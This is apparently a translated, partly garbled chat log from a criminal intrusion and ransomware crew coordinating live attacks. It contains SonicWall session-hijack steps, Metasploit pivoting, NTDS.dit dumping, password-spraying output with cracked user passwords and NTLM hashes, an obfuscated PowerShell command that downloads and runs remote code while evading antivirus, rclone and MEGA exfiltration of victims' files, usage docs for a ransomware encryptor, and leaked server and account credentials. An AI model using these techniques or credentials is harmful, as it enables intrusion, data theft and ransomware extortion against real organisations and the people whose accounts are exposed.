oh well, now I'll try it) lay on picaboy did so at least, the key got up without a fuckin' google and type in mb who knows where to get it? anyone purely by chance do not have the key to the face proxyfire?[ ] (https://stylebrooks.com/group/discussion?msg=5auyX86kHct2PnDik) gotchaThere is no such thing on this network, subconsciously immediately started looking for the new bookmark))) @ali please quote the message and not reply in the subject (the button to the left)
there notifications have to closeObviously i have the ability to create bookmarks theredanu it turns out his computer is asleep just yet, if i do not kick it happy, and just do not connect? i eleventom first made a system session and it already injected with another account may try but you "kick" the user will if he bookmark only on his workstation new artifact kit, all in the system does not migrate session from the admin * NetExtender Clients
put, yes 2fana, no you have 2fa yes? tShow bookmarks > there's no new bookmarks?
Alarm Trying to connect ...
There is a problem connecting to this machine, please check it... The client could not connect to the remote computer. Remote connections might not be enabled or the computer might be too busy to accept new connections. It is also possible that network problems are preventing your connection. Please try connecting again later. If the problem continues to occur, contact your administrator.
``Work PC there what? I can't find where to add this tab. It feels like there's no such option in Sonicleave RDP
i'm logged in there without any credentials
I don't remember exactly but it was intuitively clear create new bookmark once redirected to the portal, but there was no bookmark to connect to the PC
Same way, if you want to make a new bookmark go straight to this SMM. Try to make a session under another cookie, it doesn't ask me how, it tries to set connection to 127.0.0.1:8877
the connection is made from your ip to the sonic gateway and then to the virtual desktop (or physical host) the SMA should be just put on the dedication and it will connect through the localhostsorrie, confused with NetExtender Clients
in SMAConnect there proxy I enter: target ip, port 443, creeds?
I did and then I do not know what to do) they are fresh, here we had this, as I understand it sessions died justThrough him enter creeds, 2fa sendsThrough him try to enter was secur mobile accesses client? SonicWALL
- encoding the session ID in base64
```
>> btoa ("47ZjFKx24Nj2h0UtZKX2OYnZLgRg05aX2SuaotVzrQg=") [ENTER]
"NDdaakZLeLeDI0TmoyaDBVdFpLWDJPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- I put in the URL `https://target` (redirects to https://target/cgi-bin/welcome)
- I add a cookie to the console
```
document.cookie="swap=NDdaakZLeDI0TmoyaDBVdFpLWDJWDPWW5aTGdSZzA1YVgyU3Vhb3RWenJRZz0="
```
- In the browser (where .../cgi-bin/welcome) I edit the URL to `https://target/cgi-bin/portal`
- It takes me back to the page `https://target/cgi-bin/welcome`
so for all three sessions in the Target
one session once redirected to the portal, but there were no bookmarks to connect to the PC
Anybody had problems with this? what did you do next? @rozetka @t3chnolog thanks for your help) everything started, "went ore)) "on port 80th https raise or 8443 maybe even cobalt to roll up and try it now you can just pull jobs with socks and start with another router-repawn sessions do shorter I think you have a bad configured router `tcp 0 0 185212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby I thought it was fucked up) it's a server with a msfu no external IP? are you behind a NAT or something? interface to your provider's LAN andmeterpreter > ipconfig
Interface 1
============
Name : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00
MTU : 1520
IPv4 Address : 127.0.0.1
Interface 65539
============
Name : Microsoft Hyper-V Network Adapter #2
Hardware MAC : 00:15:5d:79:a8:19
MTU : 1500
IPv4 Address : 172.30.100.175
IPv4 Netmask : 255.255.255.0jobs -k number Print the socket list, take them all out and start one from the session you want mask /8 for 10.0.0.0 subnet only e.g. 172.8.240.5 what you have specified may not be recognized as a local address at all
10.0.0.0 - 10.255.255.255 (the subnet mask for classless (CIDR) addressing: 255.0.0.0 or /8)
100.64.0.0.0 - 100.127.255.255 (subnet mask 255.192.0.0 or /10) - This subnet is recommended by RFC 6598 for use as Carrier-Grade NAT (CGN) addresses.
172.16.0.0 - 172.31.255.255 (subnet mask: 255.240.0.0 or /12)
192.168.0.0 - 192.168.255.255 (subnet mask: 255.255.0.0 or /16)
```
wikipedia if the second then you first put it ``172.0.0.0/8`` this strange? or ufw disable this one google local network masks then ``72.0.0.0/8`` your subnet mask is still strange, you know? add session number what port forward and rules in ufw ``
IPv4 Active Routing Table
=========================
Subnet Netmask Gateway
------ ------- -------
172.30.0.0 255.0.0.0 Session 3
172.30.100.0 240.0.0.0 Session 4
``route print show the socket should look in the router specified? port fwd is another and also does not go any port forwarding on the server do not do? like this add 172.30.100.0/4 4 or tryroute add 172.0.0.0.0/4 4route add 172.0.0.0/8 session 4172.30.100.0/24 and as a router prescribed in what diap should "watch"? What I forgot to miss?
1) there is a session on the server in the coba it is not spawned
2) on the server to run sox to the local host can look into the network
What has been done : I prescribed the router
```
IPv4 Active Routing Table
------ ------- -------
172.0.0.0 255.0.0.0 Session 4
```
2) Sox started : the port on the server opened and is listening
```
msf6 auxiliary(server/socks4a) > set srv
set srvhost set srvport
msf6 auxiliary(server/socks4a) > set srvhost 185.212.129.112
srvhost => 185.212.129.112
msf6 auxiliary(server/socks4a) > set srvport 1000
srvport => 1000
msf6 auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 0.
[*] Starting the socks4a proxy server
msf6 auxiliary(server/socks4a) > netstat -antp | grep 1000
[*] exec: netstat -antp | grep 1000
tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby
msf6 auxiliary(server/socks4a) > netstat -npl
[*] exec: netstat -npl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 185.212.129.112:300 0.0.0.0:* LISTEN 555/ruby
tcp 0 0 185.212.129.112:305 0.0.0.0:* LISTEN 30554/ruby
tcp 0 0 185.212.129.112:1000 0.0.0.0:* LISTEN 30554/ruby
```
UFW disable
I prescribe in the proxychains ip server port, trying to ping hosts from the network are not pinged.I do not know well, but mba tipsPlease write to lsnu or mba someone knows regulars (although I do not know whether this issue can be resolved through regulars)anyone worked with databases maile:pass or similar bases for the brute force? data from the sharepoint / office 365 has already mastered someone to drag? which time I met that they store dokichom vssadmin not suitable?
I did a snapshot, took everything, removed it, no traces, except logs)stewartThank you.https://github.com/zcgonvh/NTDSDumpEx@t3chnolog got it, thanks!
i can recommend some other software for the dekrypt, please?
https://github.com/Dionach/NtdsAudit/issues/3Господа, has anyone encountered this?
I just downloaded `ntds.dit` and `SYSTEM` via `psexec_ntdsgrab`, then I try to use NtdsAudit, which throws the following error `Database was not shutdown cleanly. Recovery must first be run to properly complete database operations for the previous shutdown.`oki :thumbsup:alter soon release@rozetka [ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=penxyGkywNSHc7x64) hi, where did you add it?
fuck
fill it up and I'll delete the conf.
Nothing's been added. Maybe a filter by IP region? `Error: Permission denied.` Whatever, valid account or neta via web?I've tried 10 crescendos - the same Thanks for the advice, but after 3 hours, another error pops up: it may also be that a person with these crescendos are already registered as an active user with a session and you do not give it to knock out the availability of a VPN only on weekdays / certain hours, and a ban on work on weekends? guys, who faced with this?
port 443 is open, the ip is pinged, if I enter the wrong credentials, the VPN will say that the credentials are wrong
Debug log says `msg="SSLVPN tunnel connection failed"`.
Yesterday everything was fine, reinstalling Fortik did not help
Today it's uploading
Please, who is free, or who can do today's work for tomorrow, please tell me
on the "fresh" bots need to raise the rights and jump to fix the normal
PM me immediately with where to pass
´´I´ll give it to you gentlemen,´´
you write that you have nothing to work with then at 22 mc no one to take the bots?) right now, load the fresh bots with a fever, write to pm right away with where to pass the work? mm-hmm) well, you there careful krCH) in general, amsi does not give a fuck about obfuscation, it looks at the code execution after deobfuscation, ie. it looks for code execution after deobfuscation (i.e. after dll startup it seems to me)) if the network plus or minus adequate people manage it then most likely there is a simple notification and you will be scooped now) funny us)) before that all dlls and .exe were palyzed) even if there is no amsi and av does not paly inside verashell - the verashell process downloads something from the net causes suspicions
but when there is an amsi (and on server 16 it is) it's a fucking miracle you did not fuck up)well you're fucking lucky) most likely cilance is not fucking configured Version: 10.0.14393 N/A Build 143932016 server OS version where bypassed you?it's possible, but you got bypassed) dll is clean not knocked out I'm talking about regular servers, where even amsi not a lot of triggers you claw spoiler - for downlaid string you on the fuck any normal EDR at the top and bottom of the code `powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand here_your_encrypted_code`
you can throw in garbage code, saves you from some avs,Enter `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("here is your code that we saved powershell ....."))`
An example of what mine looks like: `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('https://domain.com:443/updates'))")")
notice the quotes above ""IEX and at the end ")"")) is how you should put the quotes
Click on Run Script green icon as in the screenshot
At the bottom, copy the encrypted code, in my case `cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZABvAG0AYQBpAG4ALgBjAG8AbQA6ADQANAAzAC8AdQBwAGQAYQB0AGUAcwAnACkAKQAiAA==`
Create a new .ps1 and insert
`powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand here_your_encrypted_code`,
an example of my code:
`powershell -ExecutionPolicy ByPass -NoLogo -NoProfile -windowstyle hidden -NoExit -encodedCommand cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAIgBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZABvAG0AYQBpAG4ALgBjAG8AbQA6ADQANAAzAC8AdQBwAGQAYQB0AGUAcwAnACkAKQAiAA==`
Done, try) - here, where "/ups" put anything, you can not do 2 times with the same name, made c "/a" the second time you have to change the "/a", such as "/ab", etc.
- Local Host (your domain)
- Local Port (it should be 443)
The rest as in the screenshot, check the box and click Launch.
A code will pop up, for example: `powershell.exe .....`, copy it, save it somewhere a well this dns yes(Get-ADComputer -Properties ipv4address, lastlogondate, operatingsystem -Filter {enabled -eq "true" -and OperatingSystem -Like '*Windows Server*'})I remember ??? everybody guys, here I am again, problems with internet solved:metal:sonargoldner.com throw me an invite to the conf:thumbsup:everything works, sorry for the confusionIt turns out you can watch which files are "busy" remotely:v:thank you =)` `apt-get install curl
apt-get install tmux
apt-get install default-jdk
apt-get install postgresql
change the root password
passwd root
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod +x msfinstall
./msfinstall
Then edit this file
nano /opt/metasploit-framework/bin/msfdb
Comment on the lines
# if grep -q kali /etc/os-release; then
# echo "Metasploit running on Kali Linux as root, using system database"
Save and get outmprimetrivo)manual on the set of msf who have left? =)Likewise!:thumbsup:hey guys, happy new week :metal:I will not extend the total cobalt serve anymore. who has something there - take it away. will go out the other day :) zdarovsem helloDid anyone have a friend or the opportunity to pay the bill Paypal or CC white account? $200 account to pay. PMa next already pg Up pg Dnv tmux ctrl B + [screenshot . what fly toldaa you can somehow work without tmux but not in this case small agree in small texts can help)and expand the window to the maximumCtrl + Minusprobowal yjene pomogaet the bottom leftstrl I os Kalilinukste buttons are slightly different)not, the bottom left corner of the screen is the same as the bottom left of the screen and the arrow up ( tmux ) is an analog of tmux but there are no such problems use screenpage upctrl + banda hey everyone, my question in the msf through tmux command result did not fit in the screen, is it possible how to scroll up, or tmux does not have enough native memory to save such a volume of information?hammer-all sorted out)apparently this software takes the polzak from the AD and passes to them this commandScript without a list of users differs only in two things.
- psinject 4728 x86 Invoke-SMBAutoBrute -PasswordList "Password1, Welcome1, 1qazXDR%+" -LockoutThreshold 5daeto what kind of software? smart auto brute force?
[+] received output:
[+] Success! Username: parag.sharma. Password: fusion@1234
[+] received output:
[+] Success! Username: tanuj.sharma. Password: fusion@1234
[+] received output:
[+] Success! Username: mukesh.nagda. Password: fusion@1234
[+] received output:
[+] Success! Username: rajendra.chundawat. Password: fusion@1234
[+] received output:
[+] Success! Username: rajan. Password: fusion@1234
``````
By smb brut set the names of a list of domain administrators Group name Domain Admins
Comment Designated administrators of the domain
Members
-------------------------------------------------------------------------------
admin administrator avinash.kumar
Thank you for the rest is empty hash or decrypted allfpeuser 1130 thank yousek any of the elders, can you let the brute force? steven is not here
```Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
fpeuser:1001:aad3b435b51404eeaad3b435b51404ee:78c026df2a8b5b9c5790b2ec76b51399:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5163658e468b00a5a328bbcceb2d9867:::
``and write a rota for the 2nd sessiondid the session in it vas local ipacs no 1 session is not your virtual ? )session alive ?sessions -xroute add 10.81.0.0.0/8 1rooting you in another diap were runroute add 10.0.0.0/8 1 into the studio print
ortionsHi will try)I will be gone for a couple of hours, hold on! Output aquatone in
``user@kali:~$ aquatone-discover -d ess.com
__
____ _____ ___ ______ _/ /_____ ____ ___
/ __ `/ __ `/ / / / __ `/ __/ __ \/ __ \/ _ \
/ /_/ / /_/ / /_/ / /_/ / /_/ /_/ / / / / __/
\__,_/\__, /\__,_/\__,_/\__/\____/_/ /_/\___/
/_/ discover v0.5.0 - by @michenriksen
Identifying nameservers for ess.com... Done
Using nameservers:
- 173.201.72.45
- 97.74.104.45
Checking for wildcard DNS... Done
Running collector: PublicWWW... Done (0 hosts)
Running collector: Riddler... Skipped
-> Key 'riddler_username' has not been set.
Running collector: Netcraft... Done (0 hosts)
Running collector: Threat Crowd... Done (5 hosts)
Running collector: DNSDB... Done (0 hosts)
Running collector: Wayback Machine... Done (54 hosts)
Running collector: Google Transparency Report... Done (10 hosts)
Running collector: PassiveTotal... Skipped
-> Key 'passivetotal_key' has not been set.
Running collector: HackerTarget... Done (2 hosts)
Running collector: PTRArchive... Error
-> PTRArchive returned unexpected response code: 502
Running collector: Certificate Search... Done (11 hosts)
Running collector: Censys... Skipped
-> Key 'censys_secret' has not been set.
Running collector: Shodan... Skipped
-> Key 'shodan' has not been set
Running collector: VirusTotal... Skipped
-> Key 'virustotal' has not been set.
Running collector: Dictionary... Done (8210 hosts)
Resolving 8258 unique hosts...
104.17.134.180 artcontest.ess.com
52.96.69.56 autodiscover.ess.com
3.215.239.59 blog.ess.com
96.248.123.101 conference.ess.com
96.248.123.102 connect.ess.com
72.167.218.45 email.ess.com
3.215.239.59 ess.com
3.215.239.59 ftp.ess.com
35.174.78.146 go.ess.com
104.17.132.180 library.ess.com
52.112.65.78 lyncdiscover.ess.com
104.17.133.180 refer.ess.com
34.200.47.197 resources.ess.com
52.112.67.51 sip.ess.com
3.215.239.59 static.ess.com
96.248.123.101 telecom.ess.com
104.17.136.180 together.ess.com
96.248.123.99 vpn.ess.com
3.215.239.59 www.ess.com
Found subnets:
- 3.215.239.0-255 : 5 hosts
- 96.248.123.0-255 : 4 hosts
Wrote 19 hosts to:
- file:///home/user/aquatone/ess.com/hosts.txt
- file:///home/user/aquatone/ess.com/hosts.json
``Put cali linux and aquatone in it. To search for subdomains :: for webshelf srolling \ search for VPN domains etc.
I'll roll out the tools and who needs it - PM by the way, yes, conveniently rocket portable from portable app and you'll be happyrocket this web app
they all have the same style of push notificationsHowever. it could be rocket's foxyproxistil blew up in the browser is fiancé who hasn't had this fucked up? hi.
You're welcome.oh spsdate someone coba 4.1kGirls, here's a tip for anyone who works with networks ::
When you have a network with rights - if possible make yourself on other machines (preferably server tc they work 24x7) several sessions. If you reboot the centralpoint machine with a session, you can come back to the network without wasting teammate time and do not have to wait for them to bring up your session.
=)hello! we're in cteamhai:vulcan:everyone how slow the time goes:confounded:@all
brothers and sisters, does anyone have any experience locating nix?
of particular nix servers (ubuntu, debian)
have a couple of questions @brandon here, and if anyone else needs, just gently, gentlemen.
```
Cecilia:Marquez:ranthank@mail.ru:r5SDrcedwe:ii5HBUAR
``Hi! welcomeFriends, hi all ! Does anyone have an account in linkedin ?@all have a new fix for IIS as a native module for IIS, FUDprivet writePartners! Hi all, help is needed. On sonic, please let me know who can help. ThanksNo)ralfhacker?[ ](https://stylebrooks.com/group/general?msg=Dri2mZ7FuE8h8bR5r) bqhost@exploit.im
200$
Xeon E5-2620; 16GB RAM; 16TB HDDu 2012 servaks very often have problems with rclone,3-4 mbps with a possible 600mbit,it would be desirable to find a solution to fix it,as on 2019 servak all finehttp://www.cherryservers.com/pricing/dedicated-servers```
E3-1270v6
48GB RAM DDR-4
1TB SSD
7x4TB HDD
$700
``[ ](https://stylebrooks.com/group/general?msg=Dri2mZ7FuE8h8bR5r) with expa from tun took.skien loyal hosters from whom you can take normal servers under the date for many tb for the bits
hostboss - do not offer!!! reseller... at most under the coba takeGreetings
What is the correct way to unload info from the mega, directly or through the cake?
1vpns.comdoublevpn.com guys, nakidayte please where double vpn through bitok you can buy, only verified, that the norm worked all by itself substitutedtmostmost domain itself I wrote - without https[ ](https://stylebrooks.com/group/general?msg=XkRWjCHQEiWHgMTX7) check-sonik.exe 107.0.27.225 C:\.....\sessions.јonv lx file @cod.ru it means different today used sonik checker - everything was o```
beacon> shell check-sonik.exe https://107.0.27.225 C:\.....\sessions.json
``[ ](https://stylebrooks.com/group/general?msg=64Fsi6zzMB9PsoCwr) show the command as written@all those who are out of work - please let me know, there are free vpnvs all hello
@Code sonic checker stopped working?
```
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "requests\adapters.py", line 439, in send
File "urllib3\connectionpool.py", line 755, in urlopen
File "urllib3\util\retry.py", line 574, in increment
urllib3.exceptions.MaxRetryError: HTTPSConnectionPool(host='https', port=443): Max retries exceeded with url: //107.0.27.225/cgi-bin/portal (Caused by NewConnectionError(': Failed to establish a new connection: [Errno 11001] getaddrinfo failed'))
```
https through the browser all ok by the way, also a question, I unloaded through the browser to the mega, at one point came the message that the account in the lock, no activity on the cars, where I sat on the htp was not observed, no one to connect (although for the shadow connection on htp not responsible), what can be ? how lock the mega ? in the browser in private mode, I worked, ie, leave a trace - did not leave an error invald user_idvot exactly, I tried to go to the guide, did not work for me.i.e. to leave a legacy - did not leave a legacy error invald user_idvot exactly, make friends with pklon, I tried to go by the guide, did not work for me it is so we know) Well, as if not )https://rclone.org/docs/всем hello guys, the question is, has anyone tried to make friends with anything other than the mega, namely, with some analog of the mega, such as pcloud ? If yes, can you write off in lieu, because i can't get it right hello all, tell me how to see the log of deleted files in the line? @all if you need to remake sonics - call me in the appropriate confudr For those who work with nix very useful link in fact) did not even know that through the service controller and remot register can remotely execute commands @all
https://bitvijays.github.io/LFF-IPS-P3-Exploitation.html
i suggest those who i have not downloaded it yet it will not show debug with normal outtup, and i wrote -vtry to change it to true, it may give some more useful information that will help solve the problemstrangely enough your outtup with debug appears when you have debug = false in configvot the whole config[remote]
type = mega
user = user
pass = pass
debug = false
hard_delete = falseIt looks like a junkie when it executesmaybe there's a problem in the config maybe the slashes are duplicated because it's shielding them or maybe the above is the log it writes when it's normal? well, that's the funny thing, they are duplicated
I duplicate them - they are in a normal form, but writes that the path does not find and does not download at allMaybe the trick is that the slashes are duplicated? guys, who caught this anomaly?
C:\ProgramData>rclone.exe copy "\\\HOUNAS01\Data\Projects\temp\data.zip" remote:D
ata -vv --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 1
2
2021/04/05 06:36:02 DEBUG : rclone: Version "v1.53.1" starting with parameters [
"rclone.exe" "copy" "\\\\HOUNAS01\\\Data\\Projects\\temp\\\data.zip" "remote:Data"
"-vv" "--ignore-existing" "--auto-confirm" "--multi-thread-streams" "12" "--tra
nsfers" "12"]
2021/04/05 06:36:02 DEBUG : Creating backend with remote "\\\\HOUNAS01\\\Data\\\Pr
ojects\\temp\data.zip"
2021/04/05 06:36:02 DEBUG : Using config file from "C:\Users/action.a\.config
\\rclone\\\rclone.conf"
2021/04/05 06:36:02 DEBUG : fs cache: adding new entry for parent of "\\\\HOUNAS
01\Data\\\Projects\\temp\\data.zip", "//?/UNC/HOUNAS01/Data/Projects/temp"
2021/04/05 06:36:02 DEBUG : Creating backend with remote "remote:Data"
2021/04/05 06:36:05 DEBUG : data.zip: Need to transfer - File not found at Desti
nation
writes that the file will not find, and after a minute begins to download it for himself, but the problem is that the download is about 300-400kb per second, but the server can hundreds of times moreAhave anyone batchnik adfind in which the dop removes enum_ad?
And explain someone please how to work through targets c ssh, at least in brief
car with info 3389 is closed psexec and winrm not pulled inside the mega I have not changed anything, no restrictions on download speeds in what sense? On remote normal speed? Maybe someone has experienced slow copy in rclone? speed in speedtest is great, but rclone maximum eats 2-3 MB, do not play with transfers and trades also can use -m0-5, where 0 - no compression, and 5 - the maximum compression
-r recursion
Passwords -p123 put the password 123 `"C:\Program Files\Winrar\Winrar.exe" a -tn180d "\PATH\TO\RAR.RAR" "\PATH\TO\ARCHIVE"` put all files in the archive under the name RAR not older than 180 days (all that older 180 days are not uploaded) bros welcome!
Advise current method of crypto psh.
I knew one, but it is now for some reason does not work.
I took an pch, put it on pastebin made a raw link and paste it in the command
iex((new-object net.webclient).downloadstring('https://pastebin.com/raw/RjWXyfCW'))
ran it through ps1, it converted it from 7627 to 250 characters, added the resulting code to
powershell -nop -w hidden -encodedcommand .....
And got a short string that pulled the cars through the kmd without defender detection and aveshek, also worked through wmic
Found similar sites where there is raw but they do it with a script and the session does not come.
Hi all)atomhashersarmAirspoonin googledefault url pure-storageHowdy all, has anyone come across in work with the addition to veeam backup & replication called pure-storage ?
Veeam settings show that storage is local not cloudy, on my network hostname is pinged, portscan shows 22/80/443/open ports
When trying to connect with my browser I get a "deadlock", even though it is called pure-storage login, but I do not see any window to enter the credentials.
screenshot for clarity may someone remember the logo WatSon look
i thought there +- same checks by sploit check for 10 sploit + according to the description it's charnAnna build dLLeasone> dazzleUP
[-] Could not find reflective loader in /home/user/apps/Cobalt_scripts/dazzleUP-master/dazzleUP_Reflective_DLL.dllhttps://github.com/hlldz/dazzleUP
Not checked yet. Fury[ ](https://stylebrooks.com/group/discussion?msg=SkMtKMomvuMa5Sgeu) it often happens with Fortik, the solution is to get some of the simplest rdp's in us and eu
in and in US networks sometimes with EU vpsok goes, and with the south no even though just bought - the logic is unclear. it is possible that the hoster takes in the same diepeim in webadminka in the admin panel you can configure i did not think that the network equipment can have a cloud securitinash dedikt like fortinet the fuck banned and everywhere we meet this VPN he fucking sends us blaclists are not separately on each gland, and are taken from somewhere from the fortinet clad? hi, tell me please
fortik vpn has a shared blacklist ip? -spf key helphz didn't encounter and the archiver finishes the job how to solve the problem with duplicate files in 7z?
```
7za.exe a -t7z -mx5 -ssw -pWLKfoiLn%@TYDB C:\Windows\Temp\arc.7z X:\ Y:\ Z:\
Creating archive C:\Windows\Temp\arc.7z
Error:
Duplicate filename:
Airline Logos
Airline Logos
``[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=tMh2P5WkhM76fBJPY) Did you try to put spaces in quotes? Maybe it'll help...
like:
```
shell MEGAclient.exe put -q --ignore-quota-warn "\192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z"
``Yeah, I've seen it too, but I haven't tried it yet. ``I figured out a solution, the right folder, and it's done... if anyone needs it.... `Or add an argument if you have one or just drop the client there>Unable to open local path
I guess it only takes files from the localhost. Can it pick up files from other hosts on the network? If so, what is the right command?
tried it:
```
beacon> shell MEGAclient.exe put -q --ignore-quota-warn \192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z /
[*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn \\192.168.33.20\E$\Data1\for Vincent\Data\2020Workpapers.7z /
[+] host called home, sent: 146 bytes
[+] received output:
[API:err: 14:16:36] Unable to open local path: \\?\\\192.168.33.20\E$\Data1\for
[API:err: 14:16:36] Unable to open local path: \\?\C:\Users\administrator.COVALAR\AppData\Local\MEGAcmd\Vincent\Data\2020Workpapers.7z
```
swearing on the address token is in the file browser shows everything ...Men, who has a cobalt free server with padding, need help, help out :)and there is a difference between the actual maunts with a token and the creeds directly? ``
Mounting a network drive:
net use x: \\%computer_name%\c$ /user:%domain%\user% %password%
Dismounting a network drive:
net use x: /delete /Yes
Instead of X there is a letter
``````/user:domain/admin password
if you want to run it from token[ ](https://stylebrooks.com/group/discussion?msg=TLnL2i7vXYgPTDxDK) I think you should run it from SYSTEM and not from OK, if you want to run it from a letter in the domain you would probably enter 20 disks and if you just turn on 1 locker it will work in 1 thread
but if you nomex each disk then that's 20 threads
you know what I mean? -single threads on every drive with non-mutex then you have to lock it or by the way the above implies that you have rights I think it's better to lock the machine this is your way out I think` ``
lock.exe -nomutex -p \\host\path
``````Startup parameters:
-m[all/net/local]
all - encrypt all (Default)
net - encrypt only network resources
local - encrypt local files only
example usage:
lock.exe -m all or lock.exe
lock.exe -m local
lock.exe -m net
launch example:
lock.exe -h C:\hosts.txt
-nomutex
Disables mutex protection against double starting.
-size[10/15/20/25/30/35/40/45/50/60/70/80]
This parameter defines how much % of the file will be encrypted (by default 50%), the file is encrypted in different places in chunks.
At the same time databases are 100% encrypted and VM files are 20% encrypted regardless of the value of the parameter.
example:
lock.exe -size 35
-p[path]
If this parameter is used, the locker will encrypt files in the specified path
It is forbidden to start the locker in normal mode until the specified path is processed.
example:
lock.exe -nomutex -p C:\path
lock.exe -nomutex -p C:\path2
lock.exe -nomutex -p \\\host\path
-log [path to log file]
Enables error logging
Example usage:
lock.exe -log C:\log.txt
All parameters can be combined with each other, the order is not important. If the locker is run through the command line, then run it from the admin (If you have rights).
``but without the maunta there's a separate command for remoting the path if you run the EXE locker, you will run the production dd
auxiliary services last in queue or prioritize each normal yes. 10 hypers like that at the very least.
10 servers? one virtual machine is enough) at 10 pm start a virtual machine is fine
but I would insure vpnom - 3 virtuals with a channel 1000mbps clamp just in case in the local speed gigabit two or three will + in the local + in the local + not in power to the hard will be limited to imholoker not really eats a couple of cores give a notice - in the notification settings, maybe see if there is anything to send What do not delicate? You should create a virtual on the server next to these virtuals and from one server to hammer on the harddamThat could theoretically be within the LAN speed should be normal zajoinit in the domainvirtualku create them there if you have physical servers can still on the ideaoptmally take in UC dedic, there hang a virtual and so lokalit. If you have a 100gb file, calculate how long it will take to locate it, like 10mbit/s+test the speed - sometimes on vpn slow speed stop sevries that take files``.
Is there any tricky way to connect disks from the excie server and localize?)
```
only if there is a smb balloon on the nix machine where these disks are located
```
tried different ones - they either write old or need a new one
```
only by testing
```
are there any sharpe formgrabber solutions for coba?
```
no formgrabber on sharpe, it's browser hooks, very dirty method and keylogger+styler, formgrabber is essentially meaningless with keylogger/stylera are there any solutions to formgrabber on sharpe for coba? does anyone know a way to determine the version of timeweaver on the remote machine?
i tried different ones, they say either old or new. is there any tricky way to connect disks from the ecy server and localize?
i can't crash the process from systema i already figured it out)and in it run the dll as usuala it's not like that, run the first line, there will be a cmd from systema web log address visible:
````
12/12 12:46:57 visit (port 443) from: 204.***.181.***
Request: GET /Menus.aspx
beacon beacon stager x64
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)
````
but the session does not appear not already crashed, but the session is not there, I'll do something else. What can it be, dll is working, I just threw it on the other machine 15 minutes ago````
The module "ap1.dll" was loaded but the entry-point DllRegisterServer was not found.
Make sure that "ap1.dll" is a valid DLL or OCX file and then try again.
````okay, thanks, I'll check it, and the rights are, why LPEvon utility runhttp://www.sordum.org/9416/powerrun-v1-4-run-with-highest-privileges/надо some kind of lpeadaalf by rdp? and how to make it quickly? test it from the systemnea
just from admin? have you tried from the system? it would be nice to rebuild of course
maybe it's a good idea to rebuild it? i don't know if it's working or not? i don't know if it's the right command or not and i can't get it to work through regsrv or rundll
i just need to add memory protection session to cobu. maybe aver has such sliders or i just need to turn on the pollack context if i need pollack context then i need to put akoninject to kill aver and i think there is something elseVirge
How can I get bypass on the bypass whitelist? Can someone tell me how to start a dll on the host, rundll32 and regsrv32 crash and won't let me inject it into the process?
How to bypass this kind of thing is possible? and will live jump into the win init help a fellow TOR fix please what are you fixing? men, if anyone free to help a little with the fix in the network
There is YES; network without AV, only backup stand
But all the time the session dies, a little help would be) hash on the brute force in pmspasibasiba)` python office2john.py dummy.docx > hash.txt ` not to dig ...ok - thanks digging either him, yes ...jonh the ripper software has further either hash itself brute force or in the servicedraw the password hash and give to brute force:thumbsup:thanks! hai, https://rixler.password-find.com/
try and download the dock and click reset pass, in free form, the first 3 lines of excel will decrypt the idea, the dock is something else. It helped a lot with password protectedHi all, I have a question, I have a password protected dock. All that was similar to the passwords I have already tried and passed. Is there a point to cracking a locked dock? Is it worth the trouble? And if anyone's opened it, push me in the right direction. Thank you!
I can't even imagine how they can put one into the other, too massive frameworks, one in Ruby, the other in java
```
as far as i understood the first versions of cobalt worked like that when it replaced armitage it was sort of linked to msf
i don't know why it disappeared later i can't even imagine how they put one into the other, they're too massive frameworks, one on ruby and the other on java i'd say it was a skin for armitage lolvodethe old versions had it or it was self written) but how did they put coba's skin?[ ](https://stylebrooks.com/group/discussion?msg=GBqqftAWnGR9bY9qf) 1)portscan
2)ladon portscenespartners, salaam, has anyone done this?
maybe you know modules like this? you have a task he will tell me what to do i told himflint you with a brad+speak up guys who's free for a data dump guys it's a winDoc on the public''.
USA Windows dedicated
CPU: Intel Xeon E3-1280v2
RAM: 16GB
HDD: 4TB SATA
---
199.241.189.38
u: Administrator
p: ei*xi67Bfhw8a$f%RasdxcASnsd!@
```
